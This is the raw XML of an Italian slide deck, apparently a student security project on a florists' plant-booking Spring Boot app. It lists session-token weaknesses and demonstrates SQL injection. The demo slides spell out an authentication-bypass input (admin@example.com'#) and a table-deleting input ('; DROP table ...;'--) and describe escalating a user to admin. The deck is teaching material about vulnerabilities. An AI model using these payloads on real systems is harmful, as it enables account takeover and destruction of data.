              <a:t>l token di sessione viene trasmesso senza crittografia su una connessione non sicura (HTTP anziché HTTPS), gli attaccanti possono intercettare il token e impersonare l'utente legittimo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Non è stata specificata una durata per il token, utilizzando quella predefinita dove il token rimane valido fin quando l’utente mantiene una sessione attiva.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> token di sessione non viene gestito correttamente in termini di invalidazione dopo il logout.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Memorizzazione non sicura dei token sul lato client (ad esempio, non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sono stati utilizzati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> cookie con flag "Secure" e "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>").</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3423730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Token di sessione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Nel file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>application.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>è stato specificato solo il nome del cookie di sessione, utilizzato per identificarlo, senza aggiungere ulteriori proprietà.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Nell’applicazione Spring Boot il token di sessione è stato utilizzato importando il package </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jakarta.servlet.http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>che fa parte delle specifiche del Jakarta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> API, che fornisce un framework per sviluppare applicazioni web Java. Questo package contiene le classi e le interfacce necessarie per gestire le richieste HTTP e le sessioni nel contesto di una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4B1EB7-B056-2BEA-CB4A-5CF4169D0C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940050" y="3429000"/>
            <a:ext cx="6311900" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142228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E77E6C-F8E3-D917-0A7A-55C18723729C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>L’APPLICAZIONE WEB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D50ADEC-D9E0-2C8F-1D0D-C0518870E741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L'applicazione web in esame è stata progettata specificamente per soddisfare le esigenze di una particolare categoria di venditori: i fiorai.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L'obiettivo principale di questa applicazione è consentire agli utenti di prenotare comodamente le piante desiderate per il successivo ritiro presso il negozio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L'applicazione offre due ruoli distinti:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"admin": riservato al proprietario del negozio, che ha accesso privilegiato alle funzionalità di gestione dell'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"user": destinato agli utenti che desiderano prenotare le piante.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="993324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t>Demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>Attacco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> SQL  Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Database">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCEE263-A236-0551-7D01-4A1E3E8248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6682" y="625683"/>
            <a:ext cx="5454246" cy="5454246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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52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Accesso non autorizzato</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L’applicazione ha due utenti registrati: David, con il ruolo di amministratore e Alice, con il ruolo di user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Successivamente si registra all’applicazione James, che ha intenzioni malevoli. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Di default gli verrà attribuito il ruolo di user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290F0809-A76F-5C2D-F4AE-7883CF3DC0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2237928" y="4765937"/>
            <a:ext cx="7716143" cy="657144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4024BF-2A0C-43CD-7EE9-DEC2178D46F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2237928" y="4578442"/>
            <a:ext cx="7716143" cy="187494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225812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Accesso non autorizzato</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James, nel suo primo attacco di SQL Injection, riesce ad accedere all'account amministratore di David, conoscendo solo la sua email.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere, logo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2461F058-9ADC-21A9-7837-32FFAFB04966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412462" y="3063268"/>
            <a:ext cx="4621996" cy="3108932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1698A2DE-BEC9-4A0C-4CE4-6700CFEA0AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331352" y="4467828"/>
            <a:ext cx="2783904" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Input :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>admin@example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>’#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333933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Eliminazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Table</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>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In seguito, James decide di eliminare una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> nel database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96FBC6F6-21BC-9DC1-D11E-6E67616007C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="36626"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972015" y="5108487"/>
            <a:ext cx="2455234" cy="1200873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A92847-02A2-C248-05A5-346205365433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="46164"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8697069" y="5129785"/>
            <a:ext cx="3009900" cy="1080265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connettore 2 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C861C585-9C85-7687-C11E-409D4C578B0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7427249" y="5708923"/>
            <a:ext cx="126982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DA55DCDF-9297-8138-1518-455A1672415D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7747008" y="5153207"/>
            <a:ext cx="630301" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>Dopo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Immagine 13" descr="Immagine che contiene testo, schermata, Carattere, logo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB60409-9787-A681-C6C4-06D9BD833E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="692295" y="2951543"/>
            <a:ext cx="4171932" cy="2927913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CasellaDiTesto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476AB880-13DE-E504-B031-F3F68A971B9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574938" y="3476473"/>
            <a:ext cx="5807039" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Input: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>james@example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'; DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>dropexample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="606475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Update ruolo</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Infine, James decide di modificare il suo ruolo da user a admin, ottenendo così accesso a tutte le funzionalità riservate all’amministratore.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45D603B-EA46-4DC2-D793-EF7DD8010B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3567552" y="5833641"/>
            <a:ext cx="7716143" cy="682090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12" descr="Immagine che contiene testo, schermata, Carattere, logo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
